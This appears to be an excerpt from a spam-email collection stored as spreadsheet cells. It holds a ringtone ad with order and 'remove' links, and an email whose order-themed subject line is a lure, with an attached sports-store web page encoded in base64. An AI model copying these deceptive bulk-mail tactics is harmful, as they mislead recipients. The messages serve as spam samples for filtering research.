                       &lt;/font&gt;&lt;/b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;Get 
                       cool Songs &amp;amp; Logos to your Phone today!&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
               &lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#9900FF" size="2"&gt;&amp;nbsp;&lt;b&gt;&amp;nbsp;It's 
               real simple! No confusing downloads &lt;br&gt;
               or installations.Simple phone activation!&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://freesite010.friendly-hosting.com/index.html"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font size="4" color="#00FF00"&gt;&amp;#149; 
               &amp;#149; &amp;#149; &lt;/font&gt;&lt;font size="4"&gt;Click Here to order&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;a href="http://freesite010.friendly-hosting.com/index.html"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font size="4" color="#00FF00"&gt; 
               &amp;#149; &amp;#149; &amp;#149; &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;There 
               are tons of songs and graphics to choose from.&lt;br&gt;
               See a sample of some of the songs to choose from below:&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;table width="350" border="0" cellspacing="1" cellpadding="0"&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width="141"&gt;&amp;nbsp;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor="#FF0000"&gt; 
                 &lt;td width="206"&gt;&lt;b&gt;&lt;font size="2" color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;SONG&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;b&gt;&lt;font size="2" color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;ARTIST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Get 
                   Ur Freak On&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Missy 
                   Elliott&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Billie 
                   Jean&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Michael 
                   Jackson&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Batman&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Danny 
                   Elfman&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Walk 
                   Like an Egyptian&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Bangles&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Flinstones&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Barbera&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;4 
                   Page Letter&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Aaliyah&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Like 
                   a Virgin&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Madonna&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;What's 
                   It Gonna Be?&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;B.Rhymes/J.Jackson&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Achy 
                   Breaky Heart&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Billy 
                   Ray Cyrus&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Star 
                   Spangled Banner&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;John 
                   Smith&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FF0000" height="2"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" color="#000000" face="Arial, Helvetica, sans-serif"&gt;When 
               you are ready to order, just&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFF00"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" color="#FF0000" face="Arial, Helvetica, sans-serif"&gt; 
               &lt;a href=http://freesite010.friendly-hosting.com/index.html&gt;&lt;b&gt;&lt;font size="5"&gt;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&amp;#149;click here!&lt;/font&gt;&lt;font size="5"&gt;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;and 
               we will deliver your new tunes or graphics &lt;br&gt;
               via satellite in under 5 minutes.&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
               &lt;font face=verdana size=+2&gt;&lt;center&gt;&lt;b&gt; Take yourself out of our list &lt;a href=http://freesite010.friendly-hosting.com/remove.html&gt;&lt;font color=green&gt;BY CLICKING HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/center&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: READ---SHIPPING INSTRUTIONS--FOR YOUR ORDER
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multipart MIME message.
 --= Multipart Boundary 0626010800
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
            to remove your address per--fed.--law
            print remove in subject line to-----------
            route69@biker.com
 --= Multipart Boundary 0626010800
 Content-Type: application/octet-stream;
 	name="bill redmond sports store.htm"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="bill redmond sports store.htm"
 PCEtLSBCdWxsc2V5ZSBjb2RlIC0tPg0NCjxodG1sPg0NCjxoZWFkPg0NCiAg
 PHRpdGxlPkJJTEwgUkVETU9ORCBTUE9SVFM6IEZyb20gVGVhbSBTcG9ydHMg
 VG8gQmFja3lhcmQgRnVuPC90aXRsZT4NDQogIDxNRVRBIG5hbWU9ImRlc2Ny
 aXB0aW9uIiBjb250ZW50PSJQb3dlcmVkIGJ5IFZzdG9yZSI+DQ0KICA8TUVU
 QSBuYW1lPSJrZXl3b3JkcyIgY29udGVudD0iVnN0b3JlIj4NDQo8L2hlYWQ+
 DQ0KPGJvZHkgYmFja2dyb3VuZD0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC9i
 YWNrZ3JvdW5kLmdpZiIgYmdjb2xvcj0iI0ZGRkZGRiIgbGVmdG1hcmdpbj0w
 IHRvcG1hcmdpbj0wIG1hcmdpbmhlaWdodD0iMSIgbWFyZ2lud2lkdGg9IjEi
 IGxpbms9IiMwMDAwQ0MiIHZsaW5rPSIjMzM2Njk5Ij4NDQo8dGFibGUgYm9y
 ZGVyPTAgd2lkdGg9NzgwIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD4N
 DQo8dHI+DQ0KICA8dGQgdmFsaWduPXRvcCBhbGlnbj1yaWdodCB3aWR0aD0x
 Mzc+PGltZyBzcmM9Ii92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9y
 dHMvaW1hZ2VzL2Nvcm5lcmdyYXBoaWMuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0
 PTE1NiBib3JkZXI9MD48L3RkPg0NCiAgPHRkIHZhbGlnbj10b3Agd2lkdGg9
 NDgzPg0NCiAgPHRhYmxlIGJvcmRlcj0wIGNlbGxwYWRkaW5nPTAgY2VsbHNw
 YWNpbmc9MCB3aWR0aD00ODM+DQ0KICA8dHI+DQ0KICAJPHRkIHdpZHRoPTM4
 NT48aW1nIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC90b3BiYXIuZ2lm
 IiB3aWR0aD0iMzI5IiBoZWlnaHQ9IjIxIiBib3JkZXI9MD48YnI+DQ0KPGlt
 ZyBzcmM9Ii9pbWFnZXMvc3BjbGVhci5naWYiIHdpZHRoPTI1IGhlaWdodD0x
 MSBoc3BhY2U9MCB2c3BhY2U9MCBib3JkZXI9MCBhbGlnbj1sZWZ0IGFsdD0i
 Ij4NDQo8YSBocmVmPSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9w
 YWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdl
 Lmh0bWw/bW9kZT1ob21lJmZpbGU9L3BhZ2UvaG9tZS9ob21lLnNwbCI+DQ0K
 PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvdG9wbmF2X2hvbWUu
 Z2lmIiBoZWlnaHQ9MTEgd2lkdGg9MzEgaHNwYWNlPTAgdnNwYWNlPTAgYm9y
 ZGVyPTAgYWxpZ249bGVmdCBhbHQ9IkhvbWUiPjwvYT4NDQo8aW1nIHNyYz0i
 L2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC90b3BuYXZfZGl2aWRlci5naWYiIHdp
 ZHRoPTEgaGVpZ2h0PTExIGJvcmRlcj0wIGFsaWduPWxlZnQgYWx0PSIiPg0N
 CjxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2Vn
 ZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRt
 bD9tb2RlPWhvbWUmZmlsZT0vcGFnZS9hYm91dC9hYm91dC5zcGwiPg0NCjxp
 bWcgc3JjPSIvaW1hZ2VzLzE2NDcvMTczMi8xNjg4L3RvcG5hdl9hYm91dC5n
 aWYiIGhlaWdodD0xMSB3aWR0aD01MCBoc3BhY2U9MCB2c3BhY2U9MCBib3Jk
 ZXI9MCBhbGlnbj1sZWZ0IGFsdD0iQWJvdXQgVXMiPjwvYT4NDQo8aW1nIHNy
 Yz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC90b3BuYXZfZGl2aWRlci5naWYi
 IHdpZHRoPTEgaGVpZ2h0PTExIGJvcmRlcj0wIGFsaWduPWxlZnQgYWx0PSIi
 Pg0NCjxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmluL3Bh
 Z2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3BhZ2Uu
 aHRtbD9tb2RlPW9yZGVyJmZpbGU9L2N1c3RvbWVyc2VydmljZS9sb2dpbi5z
 cGwiPg0NCjxpbWcgc3JjPSIvaW1hZ2VzLzE2NDcvMTczMi8xNjg4L3RvcG5h
 dl95b3VyLmdpZiIgaGVpZ2h0PTExIHdpZHRoPTcxIGhzcGFjZT0wIHZzcGFj
 ZT0wIGJvcmRlcj0wIGFsaWduPWxlZnQgYWx0PSJZb3VyIEFjY291bnQiPjwv
 YT4NDQo8aW1nIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC90b3BuYXZf
 ZGl2aWRlci5naWYiIHdpZHRoPTEgaGVpZ2h0PTExIGJvcmRlcj0wIGFsaWdu
 PWxlZnQgYWx0PSIiPg0NCjxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNv
 bS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxl
 c3BvcnRzL3BhZ2UuaHRtbD9tb2RlPWhlbHAmZmlsZT0vcGFnZS9oZWxwL2hl
 bHAyLnNwbCI+DQ0KPGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgv
 dG9wbmF2X2hlbHAuZ2lmIiBoZWlnaHQ9MTEgd2lkdGg9MjUgaHNwYWNlPTAg
 dnNwYWNlPTAgYm9yZGVyPTAgYWxpZ249bGVmdCBhbHQ9IkhlbHAiPjwvYT4N
 DQo8L3RkPg0NCgkgIDx0ZCB2YWxpZ249Ym90dG9tIGFsaWduPWNlbnRlciB3
 aWR0aD05OD48aW1nIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC9zaG9w
 cGluZ19jYXJ0LmdpZiIgd2lkdGg9OTUgaGVpZ2h0PTE2IGJvcmRlcj0wPjwv
 dGQ+DQ0KICA8L3RyPg0NCiAgPC90YWJsZT4NDQoJPHRhYmxlIGJvcmRlcj0w
 IGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD00ODM+DQ0KICA8
 dHI+DQ0KICAJPHRkIHZhbGlnbj10b3AgYWxpZ249bGVmdCB3aWR0aD0iMzg1
 Ij48Zm9ybSBhY3Rpb249Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmlu
 L3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3Bh
 Z2UuaHRtbCIgbWV0aG9kPSJHRVQiPg0NCiAgICA8aW5wdXQgdHlwZT0iaGlk
 ZGVuIiBuYW1lPSJtb2RlIiB2YWx1ZT0ic2VhcmNoIj4NDQogICAgPGlucHV0
 IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9Ii9wYWdlL3NlYXJj
 aC9zZWFyY2hyZXN1bHRzLnNwbCI+DQ0KICAgIDxpbWcgc3JjPSIvdnN0b3Jl
 c3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL2ltYWdlcy9oZWFkZXIuZ2lm
 IiB3aWR0aD0zNzYgaGVpZ2h0PTc0IGJvcmRlcj0wPjxCUj4NDQogICAgPGRp
 diBhbGlnbj1jZW50ZXI+PCEtLSBiZWdpbiBzZWFyY2ggLS0+DQ0KPHRhYmxl
 IGJvcmRlcj0wIHdpZHRoPTM2MCBjZWxscGFkZGluZz0xIGNlbGxzcGFjaW5n
 PTAgYmdjb2xvcj0iIzAwMzM5OSI+DQ0KPHRyPg0NCiAgPHRkIHZhbGlnbj10
 b3AgYWxpZ249bGVmdD4NDQogIDx0YWJsZSBib3JkZXI9MCB3aWR0aD0iMTAw
 JSIgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIGJnY29sb3I9IiNEQ0VE
 RjUiPg0NCiAgPHRyPg0NCiAgICA8dGQgd2lkdGg9NjUgYWxpZ249Y2VudGVy
 PjxpbWcgc3JjPSIvaW1hZ2VzLzE2NDcvMTczMi8xNjg4L3NlYXJjaF90ZXh0
 LmdpZiIgd2lkdGg9NTggaGVpZ2h0PTkgYm9yZGVyPTA+PGJyPjwvdGQ+DQ0K
 ICAgIDx0ZCBhbGlnbj1sZWZ0IHdpZHRoPTEwMD48aW5wdXQgdHlwZT0idGV4
 dCIgbmFtZT0iS2V5d29yZHMiIHNpemU9IjEzIj48L3RkPg0NCgkgIDx0ZCB3
 aWR0aD00MCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9ImltYWdlIiBzcmM9
 Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvYnRuX2dvdG9zZWFyY2guZ2lmIiB3
 aWR0aD0yOSBoZWlnaHQ9MjMgYm9yZGVyPTA+PGJyPjwvdGQ+DQ0KCSAgPHRk
 IGFsaWduPWNlbnRlciB3aWR0aD0iMTUwIj48YSBocmVmPSJodHRwOi8vd3d3
 LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxv
 d3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1zZWFyY2gmZmlsZT0v
 cGFnZS9zZWFyY2gvc2VhcmNoMi5zcGwiPjxpbWcgc3JjPSIvaW1hZ2VzLzE2
 NDcvMTczMi8xNjg4L3NlYXJjaF9hZHZhbmNlZC5naWYiIHdpZHRoPTUyIGhl
 aWdodD0xMCBib3JkZXI9MCBhbGlnbj1sZWZ0IGFsdD0iIj48L2E+PGltZyBz
 cmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvc2VhcmNoX2RpdmlkZXIuZ2lm
 IiB3aWR0aD0xIGhlaWdodD0xMCBib3JkZXI9MCBhbGlnbj1sZWZ0IGFsdD0i
 Ij48YSBocmVmPSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdl
 Z2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0
 bWw/bW9kZT1ob21lJmZpbGU9L3BhZ2Uvc2VhcmNoL3NlYXJjaF90aXBzLnNw
 bCI+PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvc2VhcmNoX3Rp
 cHMuZ2lmIiB3aWR0aD01OSBoZWlnaHQ9MTAgYm9yZGVyPTAgYWxpZ249bGVm
 dD48L2E+PC90ZD4NDQogIDwvdHI+DQ0KICA8L3RhYmxlPg0NCiAgPC90ZD4N
 DQo8L3RyPg0NCjwvdGFibGU+DQ0KPCEtLSBlbmQgc2VhcmNoIC0tPg0NCjwv
 ZGl2Pg0NCiAgICA8L2Zvcm0+PC90ZD4NDQoJICA8dGQgdmFsaWduPXRvcCBh
 bGlnbj1jZW50ZXIgd2lkdGg9OTg+DQ0KICAgIDx0YWJsZSBib3JkZXI9MCBj
 ZWxscGFkZGluZz0yIGNlbGxzcGFjaW5nPTAgYmdjb2xvcj0iIzAwMzM5OSI+
 DQ0KICAgIDx0cj4NDQogICAgICA8dGQ+PGltZyBzcmM9Ii9pbWFnZXMvc3Bj
 bGVhci5naWYiIHdpZHRoPTEgaGVpZ2h0PTEgYm9yZGVyPTA+PGJyPg0NCgkJ
 CTx0YWJsZSBib3JkZXI9MCBjZWxscGFkZGluZz01IGNlbGxzcGFjaW5nPTAg
 Ymdjb2xvcj0iI0ZGRkZGRiI+DQ0KCQkJPHRyPg0NCiAgICAgICAgPHRkIHZh
 bGlnbj1taWRkbGUgYWxpZ249Y2VudGVyPjxhIGhyZWY9Imh0dHA6Ly93d3cu
 dnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93
 d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRtbD9tb2RlPW9yZGVyJmZpbGU9L3Nj
 YXJ0MS9jYXJ0LnNwbCI+PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2
 ODgvY2FydF92aWV3Y2FydC5naWYiIHdpZHRoPTU5IGhlaWdodD05IGJvcmRl
 cj0wPjwvYT48QlI+DQ0KCQkJCTxhIGhyZWY9Imh0dHBzOi8vd3d3LnZzdG9y
 ZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xl
 c2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1vcmRlciZmaWxlPS9zY2FydDEv
 c2lnbmluLnNwbCI+PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgv
 Y2FydF9jaGVja291dC5naWYiIHdpZHRoPTU5IGhlaWdodD05IGJvcmRlcj0w
 PjwvYT4NDQoJICAgICAgPGRpdiBhbGlnbj1jZW50ZXI+DQ0KCQkJCTxpbWcg
 c3JjPSIvaW1hZ2VzLzE2NDcvMTczMi8xNjg4L2NhcnRfdG90YWwuZ2lmIiB3
 aWR0aD0yNSBoZWlnaHQ9OCBib3JkZXI9MCBoc3BhY2U9MiB2c3BhY2U9ND48
 QlI+DQ0KCQkJCTxmb250IGZhY2U9IkFyaWFsIiBzaXplPSIxIiBjb2xvcj0i
 IzAwMDAwMCI+DQ0KCQkJCQ0NCgkJCQkkMC4wMDwvZm9udD48L2Rpdj4NDQoJ
 CQkJPC90ZD4NDQogICAgICA8L3RyPg0NCiAgICAgIDwvdGFibGU+DQ0KICAg
 ICAgPC90ZD4NDQogICAgPC90cj4NDQogICAgPC90YWJsZT4NDQogICAgPC90
 ZD4NDQoJPC90cj4NDQoJPC90YWJsZT4NDQogIDwvdGQ+DQ0KICA8dGQgd2lk
 dGg9IjE4MCIgYWxpZ249Y2VudGVyIHZhbGlnbj10b3A+DQ0KICA8L3RkPg0N
 CjwvdHI+DQ0KPC90YWJsZT4NDQo8dGFibGUgYm9yZGVyPTAgd2lkdGg9Nzgw
 IGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD4NDQo8dHI+DQ0KICA8dGQg
 dmFsaWduPXRvcCB3aWR0aD0xMzcgcm93c3Bhbj00Pg0NCiAgPGltZyBzcmM9
 Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvYnJvd3NlLmdpZiIgd2lkdGg9MTM3
 IGhlaWdodD0zOSBib3JkZXI9MD48QlI+DQ0KPCEtLSBiIHRvcGNhdGxpc3Qg
 LS0+DQ0KPGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUuY29tL2NnaS1iaW4v
 cGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFn
 ZS5odG1sP21vZGU9cHJvZHVjdHMmZmlsZT0vcGFnZS9wcm9kbGlzdHY0L3By
 b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzM5OCI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjMz
 OTguZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzU0MiI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM1
 NDIuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzcwMCI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM3
 MDAuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzYwMyI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM2
 MDMuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0zMDI5NCI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MzAy
 OTQuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNDM5OCI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjQz
 OTguZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzUyOCI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM1
 MjguZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNDU2MCI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjQ1
 NjAuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNDQ5NSI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjQ0
 OTUuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNjM3OSI+PGltZyBzcmM9Ii92c3RvcmVz
 cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjYz
 NzkuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+
 DQ0KPCEtLSBlIHRvcGNhdGxpc3QgLS0+DQ0KPCEtLSBiIHRvcGNhdGxpc3Qg
 LS0+DQ0KPGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUuY29tL2NnaS1iaW4v
 cGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFn
 ZS5odG1sP21vZGU9cHJvZHVjdHMmZmlsZT0vcGFnZS9wcm9kbGlzdHY0L3By
 b2R1Y3RsaXN0LnNwbCZjYXRpZD0yOTk5NCI+PGltZyBzcmM9Ii92c3RvcmVz
